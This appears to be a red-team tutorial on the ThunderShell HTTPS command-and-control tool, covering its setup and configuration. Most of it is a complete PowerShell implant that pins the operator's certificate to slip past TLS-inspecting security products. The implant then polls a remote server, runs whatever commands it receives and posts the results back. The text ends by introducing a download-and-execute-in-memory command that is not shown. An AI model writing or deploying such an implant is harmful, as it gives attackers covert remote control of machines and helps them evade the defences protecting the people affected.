Command and Control – HTTPS

Command and control tools use a variety of protocols as their communication channel, such as DNS, ICMP and HTTPS. Many network and endpoint security products perform some form of traffic inspection, including TLS interception, in order to identify and drop suspicious connections. Using a protocol that supports encryption and pinning the implant to the operator's certificate, so that the implant refuses to talk through an intercepting proxy that presents its own certificate, can evade the majority of these products and should be considered as a method during red team engagements.

ThunderShell was developed by MrUn1k0d3r and is written in Python. It uses a Redis server as the back end for the HTTPS communication between the implant and the server, and PowerShell for the implant that executes on the target and for any other scripts. Its main advantage is that it supports certificate pinning, which bypasses security products that rely on intercepting and inspecting TLS traffic. A similar tool that uses HTTPS as the communication protocol and a PowerShell implant is PoshC2.

ThunderShell has the following dependencies:

apt install redis-server
apt install python-redis

The default.json file contains the tool configuration. Traffic encryption is enabled by setting an encryption key, and the channel is pinned with a certificate to avoid detection by products that inspect traffic.

ThunderShell – Configuration

When ThunderShell is executed it will start a web server which by default will listen on port 8080. The web server will handle all the HTTP requests from the implants.

ThunderShell – Console

The implant (PS-RemoteShell) needs to be hosted on a web server controlled by the red team. It requires the following parameters:

IP – Webserver

Port – Webserver

Encryption Key

Delay
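The certificate pinning described above and the four implant parameters just listed, as an added PowerShell example that is not ThunderShell's own PS-RemoteShell code: a minimal HTTPS beacon that accepts only the operator's certificate and otherwise stays silent. The endpoint paths (/task, /result), the X-Key header, the thumbprint value, the documentation-range IP and the way the key and delay are used are all assumptions made for the example, not ThunderShell's actual protocol. It targets Windows PowerShell 5.1, where Invoke-WebRequest honours ServicePointManager callbacks.

```powershell
# Added example, not ThunderShell's code. Parameters mirror the ones the
# implant takes (IP, port, encryption key, delay); their use below is assumed.
$Server = '203.0.113.10'    # red team web server (documentation range, assumed)
$Port   = 8080              # ThunderShell's default listening port
$Key    = 'ChangeMe'        # encryption key from default.json (sent as a header here, assumed)
$Delay  = 5                 # seconds between call-backs (assumed unit)

# SHA-1 thumbprint of the operator's server certificate (placeholder value).
# Obtain the real one with: openssl x509 -in server.pem -noout -fingerprint -sha1
$PinnedThumbprint = '0123456789ABCDEF0123456789ABCDEF01234567'

[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12

# Pinning: chain and hostname errors are ignored entirely; the ONLY thing that
# is accepted is the exact certificate whose thumbprint matches the pin.
# A TLS-inspecting proxy that substitutes its own certificate fails this
# check, so the implant never hands plaintext to the inspection engine.
# GetNewClosure() captures $PinnedThumbprint so the callback can see it.
$pinCheck = {
    param($sender, $certificate, $chain, $sslPolicyErrors)
    # GetCertHashString() returns the SHA-1 thumbprint as upper-case hex, no separators
    return ($certificate.GetCertHashString() -eq $PinnedThumbprint)
}.GetNewClosure()
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = $pinCheck

$Base    = "https://${Server}:${Port}"
$Headers = @{ 'X-Key' = $Key }   # assumed header; ThunderShell's real framing differs

while ($true) {
    try {
        # Poll for tasking. If the pin does not match, the handshake is torn
        # down and this throws a WebException before any request is sent.
        $task = (Invoke-WebRequest -Uri "$Base/task" -Headers $Headers -UseBasicParsing).Content
        if ($task) {
            try   { $output = Invoke-Expression $task 2>&1 | Out-String }
            catch { $output = $_.Exception.Message }
            Invoke-WebRequest -Uri "$Base/result" -Method Post -Headers $Headers `
                              -Body $output -UseBasicParsing | Out-Null
        }
    } catch {
        # Pin mismatch, server down or proxy interference all land here.
        # Stay quiet and retry after the delay rather than falling back to
        # an unpinned connection.
    }
    Start-Sleep -Seconds $Delay
}
```

Two caveats a practitioner will hit. First, pinning the leaf certificate means that rotating the server certificate breaks every deployed implant; for longer engagements pin a CA you control and validate the chain against it instead. Second, pinning does not make the channel invisible: an implant sitting behind a TLS-inspecting proxy produces a steady stream of aborted handshakes on the beacon interval, which a defender can alert on even though the content is never decrypted. On PowerShell 7 the callback above is not consulted by Invoke-WebRequest, so the same check has to be attached to an HttpClientHandler instead.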

The following command will download and execute the implant directly from memory.